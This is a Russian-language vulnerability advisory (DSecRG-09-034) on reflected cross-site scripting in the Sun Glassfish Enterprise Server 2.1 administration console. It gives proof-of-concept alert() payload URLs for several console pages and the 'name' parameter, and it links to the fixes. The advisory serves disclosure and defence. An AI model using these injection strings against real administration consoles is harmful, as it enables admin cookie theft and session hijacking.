
DSECRG-09-034: Консоль администрирования Glassfish Enterprise Server уязвима к межсайтовому скриптингу.
Вендор
Glassfish
Продукт
Sun Glassfish Enterprise Server 2.1
Тип уязвимости
Множественный межсайтовый скриптинг
Reported
19.03.2009
Date of Public Advisory
05.05.2009
Детальное описание
Используя данные уязвимости, злоумышленник может перехватить cookie администратора и выполнить различные действия от его имени.
1. Множественный межсайтовый скриптинг
Многие страницы подвержены типовой XSS уязвимости.
Злоумышленник может внедрить скрипт в строку URL.
Пример
http://[server]/applications/applications.jsf?’);};alert(«DSecRG_XSS»);</script><!—
http://[server]/configuration/configuration.jsf?’);};alert(«DSecRG_XSS»);</script><!—
http://[server]/customMBeans/customMBeans.jsf?’);};alert(«DSecRG_XSS»);</script><!—
http://[server]/resourceNode/resources.jsf?’);};alert(«DSecRG_XSS»);</script><!—
http://[server]/sysnet/registration.jsf?’);};alert(«DSecRG_XSS»);</script><!—
http://[server]/webService/webServicesGeneral.jsf?’);};alert(«DSecRG_XSS»);</script><!—
Ответный HTML код:
<script type=»text/javascript»>
var myonload = new Object();
myonload.oldonload = window.onload;
myonload.newonload = function() {
if (‘/applications/applications.jsf?’);};alert(«DSecRG_XSS»);</script><!—‘ != ») {
2. Множественный межсайтовый скриптинг в GET параметре «name»
Многие страницы подвержены типовой XSS уязвимости в GET параметре «name».
Злоумышленник может внедрить скрипт в строку URL.
Пример
http://[server]/configuration/auditModuleEdit.jsf?name=<IMG SRC=javascript:alert(‘DSecRG_XSS’)>
http://[server]/configuration/httpListenerEdit.jsf?name=<IMG SRC=javascript:alert(‘DSecRG_XSS’)>&configName=server-config
http://[server]/resourceNode/jdbcResourceEdit.jsf?name=<IMG SRC=javascript:alert(‘DSecRG_XSS’)>
Решение
Уязвимости исправлены в CVS.
Ссылки на изменения, устраняющие уязвимости:
https://glassfish.dev.java.net/servlets/ReadMsg?list=cvs&msgNo=29669
https://glassfish.dev.java.net/servlets/ReadMsg?list=cvs&msgNo=29668
https://glassfish.dev.java.net/servlets/ReadMsg?list=cvs&msgNo=29668